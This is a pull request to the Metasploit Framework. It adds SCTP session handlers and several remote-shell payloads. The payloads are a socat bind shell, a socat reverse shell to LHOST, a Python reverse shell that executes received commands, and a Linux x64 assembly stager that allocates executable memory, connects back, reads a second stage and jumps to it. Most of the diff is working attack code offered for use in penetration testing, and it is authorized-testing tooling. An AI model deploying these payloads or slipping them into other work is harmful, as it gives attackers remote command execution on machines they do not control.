### PR TITLE
SCTP Sessions

### DIFF
--- a/lib/msf/core/handler/bind_sctp.rb
+++ b/lib/msf/core/handler/bind_sctp.rb
@@ -1,0 +1,199 @@
+# -*- coding: binary -*-
+module Msf
+module Handler
+
+###
+#
+# This module implements the Bind SCTP handler.  This means that
+# it will attempt to connect to a remote host on a given port for a period of
+# time (typically the duration of an exploit) to see if a the payload has
+# started listening.  This can tend to be rather verbose in terms of traffic
+# and in general it is preferable to use reverse payloads.
+#
+###
+module BindSctp
+
+  include Msf::Handler
+
+  #
+  # Returns the handler specific string representation, in this case
+  # 'bind_sctp'.
+  #
+  def self.handler_type
+    return "bind_sctp"
+  end
+
+  #
+  # Returns the connection oriented general handler type, in this case bind.
+  #
+  def self.general_handler_type
+    "bind"
+  end
+
+  # A string suitable for displaying to the user
+  #
+  # @return [String]
+  def human_name
+    "bind SCTP"
+  end
+
+  #
+  # Initializes a bind handler and adds the options common to all bind
+  # payloads, such as local port.
+  #
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        Opt::LPORT(4444),
+        OptAddress.new('RHOST', [false, 'The target address', '']),
+        Opt::Proxies,
+        Opt::CPORT,
+        Opt::CHOST,
+      ], Msf::Handler::BindSctp)
+
+    self.conn_threads = []
+    self.listener_threads = []
+    self.listener_pairs = {}
+  end
+
+  #
+  # Kills off the connection threads if there are any hanging around.
+  #
+  def cleanup_handler
+    # Kill any remaining handle_connection threads that might
+    # be hanging around
+    conn_threads.each { |thr|
+      thr.kill
+    }
+  end
+
+  #
+  # Starts a new connecting thread
+  #
+  def add_handler(opts={})
+
+    # Merge the updated datastore values
+    opts.each_pair do |k,v|
+      datastore[k] = v
+    end
+
+    # Start a new handler
+    start_handler
+  end
+
+  #
+  # Starts monitoring for an outbound connection to become established.
+  #
+  def start_handler
+
+    # Maximum number of seconds to run the handler
+    ctimeout = 150
+
+    if (exploit_config and exploit_config['active_timeout'])
+      ctimeout = exploit_config['active_timeout'].to_i
+    end
+
+    # Take a copy of the datastore options
+    rhost = datastore['RHOST']
+    lport = datastore['LPORT']
+
+    # Ignore this if one of the required options is missing
+    return if not rhost
+    return if not lport
+
+    # Only try the same host/port combination once
+    phash = rhost + ':' + lport.to_s
+    return if self.listener_pairs[phash]
+    self.listener_pairs[phash] = true
+
+    # Start a new handling thread
+    self.listener_threads << framework.threads.spawn("BindSctpHandlerListener-#{lport}", false) {
+      client = nil
+
+      print_status("Started #{human_name} handler against #{rhost}:#{lport}")
+
+      if (rhost == nil)
+        raise ArgumentError,
+          "RHOST is not defined; bind stager cannot function.",
+          caller
+      end
+
+      stime = Time.now.to_i
+
+      while (stime + ctimeout > Time.now.to_i)
+        begin
+          client = Rex::Socket::Sctp.create(
+            'PeerHost' => rhost,
+            'PeerPort' => lport.to_i,
+            'Proxies'  => datastore['Proxies'],
+            'Context'  =>
+              {
+                'Msf'        => framework,
+                'MsfPayload' => self,
+                'MsfExploit' => assoc_exploit
+              })
+        rescue Rex::ConnectionError => e
+          vprint_error(e.message)
+        rescue
+          wlog("Exception caught in bind handler: #{$!.class} #{$!}")
+        end
+
+        break if client
+
+        # Wait a second before trying again
+        Rex::ThreadSafe.sleep(0.5)
+      end
+
+      # Valid client connection?
+      if (client)
+        # Increment the has connection counter
+        self.pending_connections += 1
+
+        # Timeout and datastore options need to be passed through to the client
+        opts = {
+          :datastore    => datastore,
+          :expiration   => datastore['SessionExpirationTimeout'].to_i,
+          :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
+          :retry_total  => datastore['SessionRetryTotal'].to_i,
+          :retry_wait   => datastore['SessionRetryWait'].to_i
+        }
+
+        # Start a new thread and pass the client connection
+        # as the input and output pipe.  Client's are expected
+        # to implement the Stream interface.
+        conn_threads << framework.threads.spawn("BindSctpHandlerSession", false, client) { |client_copy|
+          begin
+            handle_connection(client_copy, opts)
+          rescue => e
+            elog('Exception raised from BindSctp.handle_connection', error: e)
+          end
+        }
+      else
+        wlog("No connection received before the handler completed")
+      end
+    }
+  end
+
+  #
+  # Nothing to speak of.
+  #
+  def stop_handler
+    # Stop the listener threads
+    self.listener_threads.each do |t|
+      t.kill
+    end
+    self.listener_threads = []
+    self.listener_pairs = {}
+  end
+
+protected
+
+  attr_accessor :conn_threads # :nodoc:
+  attr_accessor :listener_threads # :nodoc:
+  attr_accessor :listener_pairs # :nodoc:
+end
+
+end
+end

--- a/lib/msf/core/handler/reverse_sctp.rb
+++ b/lib/msf/core/handler/reverse_sctp.rb
@@ -1,0 +1,237 @@
+# -*- coding: binary -*-
+require 'rex/socket'
+require 'thread'
+
+module Msf
+module Handler
+###
+#
+# This module implements the reverse SCTP handler.  This means
+# that it listens on a port waiting for a connection until
+# either one is established or it is told to abort.
+#
+# This handler depends on having a local host and port to
+# listen on.
+#
+###
+module ReverseSctp
+  include Msf::Handler
+  include Msf::Handler::Reverse
+  include Msf::Handler::Reverse::Comm
+
+  #
+  # Returns the string representation of the handler type, in this case
+  # 'reverse_sctp'.
+  #
+  def self.handler_type
+    "reverse_sctp"
+  end
+
+  #
+  # Returns the connection-described general handler type, in this case
+  # 'reverse'.
+  #
+  def self.general_handler_type
+    "reverse"
+  end
+
+  #
+  # Initializes the reverse SCTP handler and ads the options that are required
+  # for all reverse SCTP payloads, like local host and local port.
+  #
+  def initialize(info = {})
+    super
+
+    # XXX: Not supported by all modules
+    register_advanced_options(
+      [
+        OptAddress.new(
+          'ReverseListenerBindAddress',
+          [ false, 'The specific IP address to bind to on the local system' ]
+        ),
+        OptBool.new(
+          'ReverseListenerThreaded',
+          [ true, 'Handle every connection in a new thread (experimental)', false ]
+        )
+      ] +
+      Msf::Opt::stager_retry_options,
+      Msf::Handler::ReverseSctp
+    )
+
+    self.conn_threads = []
+  end
+
+  def setup_handler
+    if !datastore['Proxies'].blank? && !datastore['ReverseAllowProxy']
+      raise RuntimeError, "SCTP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
+    end
+
+    ex = false
+
+    comm = select_comm
+    local_port = bind_port
+
+    bind_addresses.each do |ip|
+      begin
+        self.listener_sock = Rex::Socket::SctpServer.create(
+          'LocalHost' => ip,
+          'LocalPort' => local_port,
+          'Comm'      => comm,
+          'Context'   =>
+          {
+            'Msf'        => framework,
+            'MsfPayload' => self,
+            'MsfExploit' => assoc_exploit
+          })
+      rescue
+        ex = $!
+        print_error("Handler failed to bind to #{ip}:#{local_port}:- #{comm} -")
+      else
+        ex = false
+        via = via_string(self.listener_sock.client) if self.listener_sock.respond_to?(:client)
+        print_status("Started #{human_name} handler on #{ip}:#{local_port} #{via}")
+        break
+      end
+    end
+    raise ex if (ex)
+  end
+  #
+  # Closes the listener socket if one was created.
+  #
+  def cleanup_handler
+    stop_handler
+
+    # Kill any remaining handle_connection threads that might
+    # be hanging around
+    conn_threads.each do |thr|
+      begin
+        thr.kill
+      rescue
+        nil
+      end
+    end
+  end
+
+  # A string suitable for displaying to the user
+  #
+  # @return [String]
+  def human_name
+    "reverse SCTP"
+  end
+
+  # A URI describing what the payload is configured to use for transport
+  def payload_uri
+    addr = datastore['LHOST']
+    uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr
+    "sctp://#{uri_host}:#{datastore['LPORT']}"
+  end
+
+  def comm_string
+    if listener_sock.nil?
+      "(setting up)"
+    else
+      via_string(listener_sock.client) if listener_sock.respond_to?(:client)
+    end
+  end
+
+  # A URI describing where we are listening
+  #
+  # @param addr [String] the address that
+  # @return [String] A URI of the form +scheme://host:port/+
+  def listener_uri(addr = datastore['ReverseListenerBindAddress'])
+    addr = datastore['LHOST'] if addr.nil? || addr.empty?
+    uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr
+    "sctp://#{uri_host}:#{bind_port}"
+  end
+
+  #
+  # Starts monitoring for an inbound connection.
+  #
+  def start_handler
+    queue = ::Queue.new
+
+    local_port = bind_port
+
+    handler_name = "ReverseSctpHandlerListener-#{local_port}"
+    self.listener_thread = framework.threads.spawn(handler_name, false, queue) { |lqueue|
+      loop do
+        # Accept a client connection
+        begin
+          client = listener_sock.accept
+          if client
+            self.pending_connections += 1
+            lqueue.push(client)
+          end
+        rescue Errno::ENOTCONN
+          nil
+        rescue StandardError => e
+          wlog [
+            "#{handler_name}: Exception raised during listener accept: #{e.class}",
+            $ERROR_INFO.to_s,
+            $ERROR_POSITION.join("\n")
+          ].join("\n")
+        end
+      end
+    }
+
+    worker_name = "ReverseSctpHandlerWorker-#{local_port}"
+    self.handler_thread = framework.threads.spawn(worker_name, false, queue) { |cqueue|
+      loop do
+        begin
+          client = cqueue.pop
+
+          unless client
+            elog("#{worker_name}: Queue returned an empty result, exiting...")
+          end
+
+          # Timeout and datastore options need to be passed through to the client
+          opts = {
+            datastore:     datastore,
+            expiration:    datastore['SessionExpirationTimeout'].to_i,
+            comm_timeout:  datastore['SessionCommunicationTimeout'].to_i,
+            retry_total:   datastore['SessionRetryTotal'].to_i,
+            retry_wait:    datastore['SessionRetryWait'].to_i
+          }
+
+          if datastore['ReverseListenerThreaded']
+            thread_name = "#{worker_name}-#{client.peerhost}"
+            conn_threads << framework.threads.spawn(thread_name, false, client) do |client_copy|
+              handle_connection(client_copy, opts)
+            end
+          else
+            handle_connection(client, opts)
+          end
+        rescue StandardError => e
+          elog('Exception raised from handle_connection', error: e)
+        end
+      end
+    }
+  end
+
+  #
+  # Stops monitoring for an inbound connection.
+  #
+  def stop_handler
+    # Terminate the listener thread
+    listener_thread.kill if listener_thread && listener_thread.alive? == true
+
+    # Terminate the handler thread
+    handler_thread.kill if handler_thread && handler_thread.alive? == true
+
+    begin
+      listener_sock.close if listener_sock
+    rescue IOError
+      # Ignore if it's listening on a dead session
+      dlog("IOError closing listener sock; listening on dead session?", LEV_1)
+    end
+  end
+
+  protected
+
+  attr_accessor :listener_sock # :nodoc:
+  attr_accessor :listener_thread # :nodoc:
+  attr_accessor :handler_thread # :nodoc:
+  attr_accessor :conn_threads # :nodoc:
+end
+end
+end

--- a/lib/msf/core/payload/linux/x64/reverse_sctp_x64.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_sctp_x64.rb
@@ -1,0 +1,184 @@
+# -*- coding: binary -*-
+
+module Msf
+
+
+###
+#
+# Complex reverse SCTP payload generation for Linux ARCH_X64
+#
+###
+
+module Payload::Linux::ReverseSctp_x64
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Linux
+
+  #
+  # Generate the first stage
+  #
+  def generate(_opts = {})
+    conf = {
+      port:        datastore['LPORT'],
+      host:        datastore['LHOST'],
+      retry_count:   datastore['StagerRetryCount'],
+      sleep_seconds: datastore['StagerRetryWait'],
+    }
+
+    # Generate the advanced stager if we have space
+    if self.available_space && required_space <= self.available_space
+      conf[:exitfunk] = datastore['EXITFUNC']
+    end
+
+    generate_reverse_sctp(conf)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def transport_config(opts={})
+    transport_config_reverse_sctp(opts)
+  end
+
+  #
+  # Generate and compile the stager
+  #
+  def generate_reverse_sctp(opts={})
+    asm = asm_reverse_sctp(opts)
+    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
+  end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    # Start with our cached default generated size
+    space = 300
+
+    # Reliability adds 10 bytes for recv error checks
+    space += 10
+
+    # The final estimated size
+    space
+  end
+
+  #
+  # Generate an assembly stub with the configured feature set and options.
+  #
+  # @option opts [Integer] :port The port to connect to
+  # @option opts [String] :host The host IP to connect to
+  # @option opts [Bool] :reliable Whether or not to enable error handling code
+  #
+  def asm_reverse_sctp(opts={})
+    # TODO: reliability is coming
+    retry_count  = opts[:retry_count]
+    reliable     = opts[:reliable]
+    encoded_port = "%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
+    encoded_host = "%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
+    seconds = (opts[:sleep_seconds] || 5.0)
+    sleep_seconds = seconds.to_i
+    sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
+
+    if respond_to?(:generate_intermediate_stage)
+      pay_mod = framework.payloads.create(self.refname)
+      read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
+    elsif !module_info['Stage']['Payload'].empty?
+      read_length = module_info['Stage']['Payload'].size
+    else
+      read_length = 4096
+    end
+
+    asm = %Q^
+      mmap:
+        xor    edi, edi
+        push   0x9
+        pop    rax
+        cdq
+        mov    dh, 0x10
+        mov    rsi, rdx
+        xor    r9, r9
+        push   0x22
+        pop    r10
+        push   0x7
+        pop    rdx
+        syscall ; mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
+        test   rax, rax
+        js failed
+
+        push   #{retry_count}        ; retry counter
+        pop    r9
+        push   rax
+        push   0x29
+        pop    rax
+        cdq
+        push   0x2
+        pop    rdi
+        push   0x1
+        pop    rsi
+        push   0x84 ; IPPROTO_SCTP
+        pop    rdx
+        syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP)
+        test   rax, rax
+        js failed
+
+        xchg   rdi, rax
+
+      connect:
+        mov    rcx, 0x#{encoded_host}#{encoded_port}
+        push   rcx
+        mov    rsi, rsp
+        push   0x10
+        pop    rdx
+        push   0x2a
+        pop    rax
+        syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
+        pop    rcx
+        test   rax, rax
+        jns    recv
+
+      handle_failure:
+        dec    r9
+        jz     failed
+        push   rdi
+        push   0x23
+        pop    rax
+        push   0x#{sleep_nanoseconds.to_s(16)}
+        push   0x#{sleep_seconds.to_s(16)}
+        mov    rdi, rsp
+        xor    rsi, rsi
+        syscall                      ; sys_nanosleep
+        pop    rcx
+        pop    rcx
+        pop    rdi
+        test   rax, rax
+        jns    connect
+
+      failed:
+        push   0x3c
+        pop    rax
+        push   0x1
+        pop    rdi
+        syscall ; exit(1)
+
+      recv:
+        pop    rsi
+        push   0x#{read_length.to_s(16)}
+        pop    rdx
+        syscall ; read(3, "", #{read_length})
+        test   rax, rax
+        js     failed
+
+        jmp    rsi ; to stage
+    ^
+
+    asm
+  end
+
+end
+
+end

--- a/lib/msf_autoload.rb
+++ b/lib/msf_autoload.rb
@@ -194,6 +194,7 @@ class MsfAutoload
       'jboss' => 'JBoss',
       'send_uuid_x64' => 'SendUUID_x64',
       'reverse_tcp_x64' => 'ReverseTcp_x64',
+      'reverse_sctp_x64' => 'ReverseSctp_x64',
       'block_api_x64' => 'BlockApi_x64',
       'exitfunk_x64' => 'Exitfunk_x64',
       'reverse_http_x64' => 'ReverseHttp_x64',

--- a/modules/payloads/singles/cmd/unix/bind_socat_sctp.rb
+++ b/modules/payloads/singles/cmd/unix/bind_socat_sctp.rb
@@ -1,0 +1,49 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+module MetasploitModule
+
+  CachedSize = 70
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Bind SCTP (via socat)',
+      'Description'   => 'Creates an interactive shell via socat',
+      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::BindSctp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'socat',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate(_opts = {})
+    vprint_good(command_string)
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    "socat sctp-listen:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+  end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_socat_sctp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_socat_sctp.rb
@@ -1,0 +1,49 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+module MetasploitModule
+
+  CachedSize = 87
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Reverse SCTP (via socat)',
+      'Description'   => 'Creates an interactive shell via socat',
+      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::ReverseSctp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'socat',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate(_opts = {})
+    vprint_good(command_string)
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    "socat sctp-connect:#{datastore['LHOST']}:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+  end
+
+end

--- a/modules/payloads/singles/python/shell_reverse_sctp.rb
+++ b/modules/payloads/singles/python/shell_reverse_sctp.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Payload::Python
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Reverse SCTP (via python)',
+      'Description'   => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.',
+      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseSctp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'python',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate(_opts = {})
+    super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    cmd = <<~PYTHON
+      import socket as s
+      import subprocess as r
+      so=s.socket(s.AF_INET,s.SOCK_STREAM,132)
+      so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
+      while True:
+        d=so.recv(1024)
+        if len(d)==0:
+          break
+        p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+        o=p.stdout.read()+p.stderr.read()
+        try:
+          so.send(o)
+        except OSError as e:
+          if e.errno != 22:
+            raise
+    PYTHON
+
+    py_create_exec_stub(cmd)
+  end
+end
+

--- a/modules/payloads/stagers/linux/x64/reverse_sctp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_sctp.rb
@@ -1,0 +1,25 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+
+  CachedSize = 130
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Linux::ReverseSctp_x64
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Reverse SCTP Stager',
+      'Description'   => 'Connect back to the attacker',
+      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_X64,
+      'Handler'       => Msf::Handler::ReverseSctp,
+      'Stager'        => { 'Payload' => '' }))
+  end
+
+end


### PR DESCRIPTION
With the introduction of SCTP socket support in Rex::Socket via https://github.com/rapid7/rex-socket/pull/56, Framework can utilize this protocol for session transports similarly to  TCP as it is a stream-wise transport.
Implement bind and reverse handlers for the new socket type. Implement example bind and reverse payloads using socat copying from the initial udp sessions implementation.

Testing:
  Rudimentary bind session test against local Libvirt Linux VM

Next steps:
  Implement the language-level payloads for the interpreters common
to POSIX environments supporting SCTP.
  Implement meterpreter transports for SCTP in Python, PHP, Mettle,
and Java modalities (Windows doesn't support it without carrying its own usermode protocol library).

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use payload/cmd/unix/bind_socat_sctp`
- [x] set RHOST to the machine on which you are running `socat`
- [x] generate payload
- [x] run payload on target (may need sudo to auto-load kmod)
- [x] `to_handler` to initiate bind to the `socat` SCTP listener
- [x] **Verify** interactive session
